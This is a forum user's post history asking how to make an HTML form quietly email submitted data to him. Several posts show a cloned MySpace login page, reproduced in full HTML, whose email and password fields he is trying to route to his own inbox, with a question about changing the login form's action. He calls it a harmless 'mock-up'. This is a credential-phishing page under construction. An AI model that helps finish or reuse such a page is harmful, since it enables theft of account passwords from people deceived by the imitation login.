Jump to content

Jager

Members
  • Posts

    7
  • Joined

  • Last visited

Everything posted by Jager

  1. Could anybody please tell me how I can go about solving this?
  2. Well I got my form mailer working, but for some reason it takes like a few hours for the email to get to me. Is this something to do with my server?
  3. Jager

    Form Mailer

    Guys.. Im trying all of your ideas and Ive searched a whole bunch on google.Heres my current situationI did the form at www.thesitewizard.com and I put the code they gave me into feedback.php and uploaded that to my site..then I took the HTML they gave me and put that in a page, changed the appearance and uploaded it, and it doesnt work.so i took the original coding without changing it and uploaded it as another page, and it DOES work. Ive gone through and through the first one that I changed to check if the forms contained the same information and as far as I can tell, they do.here are the sites(original form)http://www.pwnageforce.com/test.html(edited form)http://www.pwnageforce.com/test2.html Any help other than "google it stupid" would be really apreciated
  4. Jager

    Form Mailer

    Ok i changed the my email thing in the php file, then put this code into my body where i wanted it to appear <form action="FormToEmail.php" method="post"> <td width="238" height="133" valign="top"><table width="238" border="0" cellspacing="5" bgcolor="#FFFFFF"> <!--DWLayoutTable--> <tr> <td height="24" colspan="3"><font size="1.5" face="Verdana, Arial, Helvetica, sans-serif">E-Mail:</font></td><td colspan="3"><input name="E-Mail" type="text" id="E-Mail" size="20"></td> <td width="3"></td> <td width="16"></td> </tr> <tr> <td height="24" colspan="3"><font face="Verdana, Arial, Helvetica, sans-serif" size="1.5">Password</font></td><td colspan="3"><input name="Password" type="password" id="Password" size="20"></td> <td></td> <td></td> </tr> <tr> <td width="11" height="14"> <td width="15"> <td colspan="5" valign="top"> <div align="center"><strong><a class="redlink7" href="index.cfm?fuseaction=user.retrievepassword"><font color="#cc0000" size="1.5" face="Verdana, Arial, Helvetica, sans-serif">Forgot your password?</font></a></strong> </div> <td></td> <tr> <td height="26"> </td> <td colspan="3" valign="top"> <div align="center"> <input type="checkbox" name="Remember" value="Remember"> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> Remember Me </font> </div> <td width="16"> <td colspan="3" valign="top"> <input name="submit" type="submit" value="Log In"> <tr> <td height="9"> <td> <td width="8"> <td width="86"> <td> <td width="21"> <td></td> <td></td> </table></td> </form> The form stuff looks alright on the page, but it does not send the info to my email. Any help guys?By the way, the page is located here( dont put your real info in, just put something fake so i can see if it shows up in my email )
  5. Jager

    Form Mailer

    Ok for some reason when I click "Send This Mail Message Now" it still pops up an outlook window. I did it exactly as you did, but just edited the text.Im actually using it for a mock-up myspace login page... for no particular reason :)Anyways, here is the code of the page, and there is a Login and Password form that I cant seem to edit to send to my email.(P.S. Sorry for all the code, normally I would not do this. But Im frustrated and Ive done everything to my knowledge so Im hoping this might help) <html><head> <title>Myspace.com</title> <meta name="keywords" content="friends networking sharing photos finding friends blogs journals blogging journaling bands music rate pics join groups forums classifieds online social networking"> <meta name="description" content="Find old friends and meet new friends as you network, share photos, create blogs, and more at MySpace.com"> <meta http-equiv="expires" content="0"><meta http-equiv="Pragma" content="no-cache"><link rel="STYLESHEET" type="text/css" href="http://x.myspace.com/js/myspace.css"><script language="JavaScript"> randomseed = Date.parse(new Date());</script><script language="JavaScript" SRC="http://x.myspace.com/js/myspace.js"></script><script language="Javascript" src="http://x.myspace.com/js/ASJS027.js"></script></head><body bgcolor="e5e5e5" alink="4e607b" link="4e607b" vlink="4e607b" bottommargin="0" leftmargin="0" rightmargin="0" topmargin="0" onload="document.theForm.email.focus();"><script language="JavaScript" src="http://x.myspace.com/js/functions.js"></script><DIV id="tipDiv" style="position:absolute; visibility:hidden; z-index:100"></DIV><div align="center"> <table width="800" border="0" align="center" cellpadding="5" cellspacing="0" bgcolor="003399"> <form action="http://searchresults.myspace.com/index.cfm?fuseaction=advancedFind.results&websearch=1&spotId=2" method="post"> <tr> <td> <a href="http://www.myspace.com"><img src="http://x.myspace.com/images/header_43.gif" border="0"></a> </td> <td align="left"><font color="FFFFFF">The Web <input type="radio" name="searchtype" value="web" checked> MySpace <input type="radio" name="searchtype" value="myspace"> <input style="font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 10px;" name="searchrequest" type="text" size="25" maxlength="75"> <input type="submit" value="Search" style="font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-size: 10px; background-color:E0FFFF;"></td> <td align="right"><a class="man" href="http://www.myspace.com/index.cfm?fuseaction=misc.faq&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406"><font color="FFFFFF">Help</font></a> <font color="FFFFFF" size="1">|</font> <a class="man" href="http://signup.myspace.com/index.cfm?fuseaction=Join&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406"><font color="FFFFFF">SignUp</font></a> </td> </tr> </form> </table> <!-- end oas add logic --> </div> <script language="Javascript"> randomseed = Date.parse(new Date()); </script> <script language="Javascript" src="http://x.myspace.com/js/ASJS027.js"></script><div align="center"><table width="800" border="0" cellspacing="0" cellpadding="20"> <tr valign="top" bgcolor="FFFFFF"> [color="red"]<form action="http://login.myspace.com/index.cfm?fuseaction=login.process&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" method="post" name="theForm" id="theForm">[/color][color="red"]//Is this something that may need editing?[/color] <input type="hidden" name="NextPage" value=""> <td><p><span class="blacktext15">You Must Be Logged-In to do That! </span><br><br> <font size="2">MySpace is FREE, But You Must Be a Member to Use That Feature</font></p> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr valign="top"> <td width="70%"> <table width="300" border="0" align="center" cellpadding="1" cellspacing="0"> <tr> <td valign="top" bgcolor="003399"> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td valign="top" bgcolor="FFFFFF"> <div align="center"><strong><font color="003399">Member Login</font></strong><br> <table width="100%" border="0" cellspacing="0" cellpadding="3"> <tr> <td width="28%"><div align="right">E-Mail:</div></td> <td width="72%"><input type="text" name="email" value="" size="20"></td> </tr> <tr> <td><div align="right">Password:</div></td> <td><input type="password" name="password" size="20"></td> </tr> <tr valign="top"> <td colspan="2"><div align="center"> <a class="redlink7" href="index.cfm?fuseaction=user.retrievepassword"><font size="1">Forgot your password?</font></a><br> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="142" height="30" valign="bottom"> <div align="center"> <input type="checkbox" name="Remember" value="Remember">Remember Me</div> <div align="right"></div> </td> <td width="40" valign="bottom"> <input type="image" name="Submit22" src="images/button_login_main.gif" alt="Log In"> </td> </tr> </table> </div></td> </tr> </table> </div> </td> </tr> </table> </td> </tr> </table> </td> <td width="30%" valign="middle"> </td> </tr> </table> <p><font color="000000" size="2"><strong>Not a MySpace Member? Join FREE and Get Connected!</strong></font></p> <p><strong><font color="000000" size="2"> <a class="redlink7" href="http://signup.myspace.com/index.cfm?fuseaction=join"><img src="http://x.myspace.com/images/button_signup_main2.gif" alt="Sign Up Now!" title="Sign Up Now!" width="121" height="35" border="0"></a></font></strong></p> <p><font color="000000" size="2"><strong>After You Sign Up You Can:</strong></font></p> <ul> <li><font size="2"><font color="000000">Create Free Profiles on MySpace</font></font></li> <li><font size="2"><font color="000000">Upload Pictures & Write Blogs </font></font></li> <li><font size="2"><font color="000000">Use MySpace Mail & Instant Messenger</font></font></li> </ul> <font size="2"><font color="000000"></font></font> <div align="center"></div> </td> <td width="300"> <div align="center"> <span class="blacktext15"> <script language="Javascript"> <!-- oas_ad("/login,11014001","x08"); //--> </script> </span> </div> </td> </form> </tr> <tr valign="bottom" bgcolor="FFFFFF"> <td colspan="2"> </td> </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr bgcolor="#e5e5e5" valign="top"> <td> <div align="center"> <div align="center"> <b> <font color="003399" size="1" face="Arial, Helvetica, sans-serif"> <a class="text" href="http://www.myspace.com/misc/about.html?z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>About</u></a> | <a class="text" href="http://viewmorepics.myspace.com/index.cfm?fuseaction=misc.faq&z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>FAQ</u></a> | <a class="text" href="http://viewmorepics.myspace.com/misc/terms.html?z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>Terms</u></a> | <a class="text" href="http://viewmorepics.myspace.com/misc/privacy.html?z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>Privacy</u></a> | <a class="text" href="http://viewmorepics.myspace.com/misc/safetytips.html?z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>Safety Tips</u></a> | <a class="text" href="http://viewmorepics.myspace.com/misc/contact.cfm?z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>Contact Myspace </u></a> | <a class="text" href="http://viewmorepics.myspace.com/misc/promote.html?z=1&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>Promote!</u></a> | <a class="text" href="http://viewmorepics.myspace.com/misc/advertise.cfm?&Mytoken=FA9AD08B-3CE6-4522-AE78854CBEA9D5451306609406" target="_blank"><u>Advertise</u></a></b> </font> </div> <br> <a href="http://www.myspace.com/"> <div align="center"> <font size="1" face="Arial, Helvetica, sans-serif" color="black"> <u>©2003-2006 MySpace.com All Rights Reserved.</u> </font> </div></a> </div> </td> </tr></table> <!-- traffic tracking start --><!-- traffic tracking end --></body> <IFRAME SRC="" NAME="OnlineNowBuffer" ID="OnlineNowBuffer" STYLE="border:0px;width:0px;height:0px;"></IFRAME> <script TYPE="text/javascript"> onlineNowInfoURL="http://onlinenow.myspace.com/OnlineNow/UsersOnline.html"; javaScriptURL="http://x.myspace.com"; ImageStore=new Array(); ImageStore[0]=new Object(); ImageStore[0].url="http://i.myspace.com"; ImageStore[0].baseID=0; clearImage=new Image(); clearImage.src="http://i.myspace.com/site/images/clear.gif"; onlineNowImage=new Image(); onlineNowImage.src="http://i.myspace.com/site/images/onlinenow.gif"; </SCRIPT> <script TYPE="text/javascript" SRC="http://x.myspace.com/js/OnlineNowNodeParser.js?version=10"></SCRIPT> <script TYPE="text/javascript" DEFER="DEFER"> window.setTimeout("onlineNowNodeParser=new OnlineNowNodeParser(\"OnlineNowBuffer\");onlineNowNodeParser.run();", 100); </SCRIPT></html><!-- onRequestEnd --> Keep in mind this is all in good fun, Im not doing this maliciously or anything. Just trying to learn how to use forms in a fun way
  6. Jager

    Form Mailer

    Ok I saw this example herehttp://www.w3schools.com/html/tryit.asp?fi...yhtml_form_mailBut I dont want this part of the code <form action="MAILTO:someone@w3schools.com" method="post" enctype="text/plain"> Because once you click "submit" it opens whatever mail client you use to send the email.I would like to know how to quietly send the email to me so they can just enter a comment on my page, and hit submit and it will send to me.Is this possible?
×
×
  • Create New...